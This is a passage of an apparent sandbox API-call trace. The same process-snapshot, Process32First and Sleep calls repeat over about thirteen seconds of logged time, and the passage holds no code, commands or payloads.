lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.791] Sleep (dwMilliseconds=0x64) [0141.914] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x246c [0141.924] Process32First (in: hSnapshot=0x246c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.071] Sleep (dwMilliseconds=0x64) [0142.184] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24cc [0142.194] Process32First (in: hSnapshot=0x24cc, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.259] Sleep (dwMilliseconds=0x64) [0142.375] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24dc [0142.409] Process32First (in: hSnapshot=0x24dc, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.515] Sleep (dwMilliseconds=0x64) [0142.617] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24f4 [0142.629] Process32First (in: hSnapshot=0x24f4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.695] Sleep (dwMilliseconds=0x64) [0142.821] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2448 [0142.832] Process32First (in: hSnapshot=0x2448, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.970] Sleep (dwMilliseconds=0x64) [0143.193] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x247c [0143.201] Process32First (in: hSnapshot=0x247c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.284] Sleep (dwMilliseconds=0x64) [0143.429] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24a4 [0143.439] Process32First (in: hSnapshot=0x24a4, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.561] Sleep (dwMilliseconds=0x64) [0143.712] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c74 [0143.720] Process32First (in: hSnapshot=0x1c74, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.798] Sleep (dwMilliseconds=0x64) [0143.945] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23ec [0143.955] Process32First (in: hSnapshot=0x23ec, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.002] Sleep (dwMilliseconds=0x64) [0144.114] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23ec [0144.124] Process32First (in: hSnapshot=0x23ec, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.190] Sleep (dwMilliseconds=0x64) [0144.303] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23ec [0144.311] Process32First (in: hSnapshot=0x23ec, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.364] Sleep (dwMilliseconds=0x64) [0144.489] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x344 [0144.496] Process32First (in: hSnapshot=0x344, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.583] Sleep (dwMilliseconds=0x64) [0144.693] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0144.701] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.746] Sleep (dwMilliseconds=0x64) [0144.848] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0144.858] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.905] Sleep (dwMilliseconds=0x64) [0145.021] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0145.032] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.092] Sleep (dwMilliseconds=0x64) [0145.208] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0145.218] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.278] Sleep (dwMilliseconds=0x64) [0145.395] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0145.404] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.454] Sleep (dwMilliseconds=0x64) [0145.567] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0145.584] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.640] Sleep (dwMilliseconds=0x64) [0145.755] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0145.767] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.813] Sleep (dwMilliseconds=0x64) [0145.930] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0145.938] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.982] Sleep (dwMilliseconds=0x64) [0146.099] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0146.110] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.171] Sleep (dwMilliseconds=0x64) [0146.290] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0146.302] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.360] Sleep (dwMilliseconds=0x64) [0146.474] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0146.483] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.538] Sleep (dwMilliseconds=0x64) [0146.662] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0146.673] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.872] Sleep (dwMilliseconds=0x64) [0146.989] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0146.998] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.044] Sleep (dwMilliseconds=0x64) [0147.145] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0147.153] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.202] Sleep (dwMilliseconds=0x64) [0147.317] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0147.329] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.421] Sleep (dwMilliseconds=0x64) [0147.538] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0147.550] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.617] Sleep (dwMilliseconds=0x64) [0147.728] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24ac [0147.740] Process32First (in: hSnapshot=0x24ac, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.822] Sleep (dwMilliseconds=0x64) [0147.926] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24ac [0147.939] Process32First (in: hSnapshot=0x24ac, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.991] Sleep (dwMilliseconds=0x64) [0148.098] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24ac [0148.109] Process32First (in: hSnapshot=0x24ac, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.171] Sleep (dwMilliseconds=0x64) [0148.287] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24ac [0148.299] Process32First (in: hSnapshot=0x24ac, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.358] Sleep (dwMilliseconds=0x64) [0148.475] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0148.489] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.549] Sleep (dwMilliseconds=0x64) [0148.662] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0148.674] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.735] Sleep (dwMilliseconds=0x64) [0148.849] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0148.861] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.920] Sleep (dwMilliseconds=0x64) [0149.036] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0149.046] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.149] Sleep (dwMilliseconds=0x64) [0149.254] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0149.266] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.319] Sleep (dwMilliseconds=0x64) [0149.426] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0149.438] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.497] Sleep (dwMilliseconds=0x64) [0149.598] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0149.608] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.660] Sleep (dwMilliseconds=0x64) [0149.770] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0149.782] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.842] Sleep (dwMilliseconds=0x64) [0149.958] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0149.969] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.020] Sleep (dwMilliseconds=0x64) [0150.130] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0150.142] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.203] Sleep (dwMilliseconds=0x64) [0150.318] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0150.329] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.399] Sleep (dwMilliseconds=0x64) [0150.505] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0150.517] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.569] Sleep (dwMilliseconds=0x64) [0150.676] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0150.691] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.748] Sleep (dwMilliseconds=0x64) [0150.866] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0150.879] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.933] Sleep (dwMilliseconds=0x64) [0151.036] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0151.047] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.097] Sleep (dwMilliseconds=0x64) [0151.209] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0151.220] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.293] Sleep (dwMilliseconds=0x64) [0151.396] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x202c [0151.409] Process32First (in: hSnapshot=0x202c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.517] Sleep (dwMilliseconds=0x64) [0152.144] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x172c [0152.156] Process32First (in: hSnapshot=0x172c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.256] Sleep (dwMilliseconds=0x64) [0152.496] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2510 [0152.508] Process32First (in: hSnapshot=0x2510, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.568] Sleep (dwMilliseconds=0x64) [0153.101] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x24e0 [0153.112] Process32First (in: hSnapshot=0x24e0, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.181] Sleep (dwMilliseconds=0x64) [0153.353] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2448 [0153.363] Process32First (in: hSnapshot=0x2448, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.544] Sleep (dwMilliseconds=0x64) [0153.692] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x245c [0153.704] Process32First (in: hSnapshot=0x245c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.791] Sleep (dwMilliseconds=0x64) [0153.896] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2458 [0153.906] Process32First (in: hSnapshot=0x2458, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.009] Sleep (dwMilliseconds=0x64) [0154.114] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0154.126] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.182] Sleep (dwMilliseconds=0x64) [0154.294] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0154.305] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.359] Sleep (dwMilliseconds=0x64) [0154.474] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0154.486] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.596] Sleep (dwMilliseconds=0x64) [0154.707] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0154.719] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.780] Sleep (dwMilliseconds=0x64) [0154.895] CreateToolhelp32Snapshot (dwFlags=0x2, 